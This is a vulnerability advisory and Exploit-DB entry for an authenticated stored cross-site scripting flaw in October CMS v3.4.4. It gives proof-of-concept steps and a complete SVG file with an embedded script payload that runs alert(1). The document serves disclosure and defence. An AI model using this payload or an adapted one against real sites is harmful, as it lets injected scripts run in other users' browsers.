Vendor: October CMS
By: Okan Kurtulus
CVSS: 5.5 (MEDIUM)
Type: Stored Cross-Site Scripting (XSS)
CWE: 79
Product Name: October CMS
Affected Version From: v3.4.4
Affected Version To: v3.4.4
Patch Exists: NO
Related CWE:
CPE: a:october_cms:october_cms:3.4.4
Metasploit:
Other Scripts:
Platforms Tested: Ubuntu 22.04
2023

October CMS v3.4.4 – Stored Cross-Site Scripting (XSS) (Authenticated)

An authenticated user with file upload permission can upload a specially crafted SVG file containing a malicious JavaScript payload. When the uploaded file is then requested directly from the directory it is stored in, the browser executes the payload, resulting in a stored cross-site scripting (XSS) attack.

Mitigation:

Implement input validation and sanitization techniques to prevent the execution of malicious scripts. Ensure that uploaded files are properly validated and restricted to safe formats.

Exploit-DB raw data:

#Exploit Title: October CMS v3.4.4 - Stored Cross-Site Scripting (XSS) (Authenticated)
#Date: 29 June 2023
#Exploit Author: Okan Kurtulus
#Vendor Homepage: https://octobercms.com
#Version: v3.4.4
#Tested on: Ubuntu 22.04
#CVE : N/A

# Proof of Concept:
1– Install the system through the website and log in with any user with file upload authority.
2– Select "Media" in the top menu. Prepare an SVG file using the payload below.
3– Upload the SVG file and call the relevant file from the directory it is in. XSS will be triggered.

#Stored XSS Payload:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(1);
  </script>
</svg>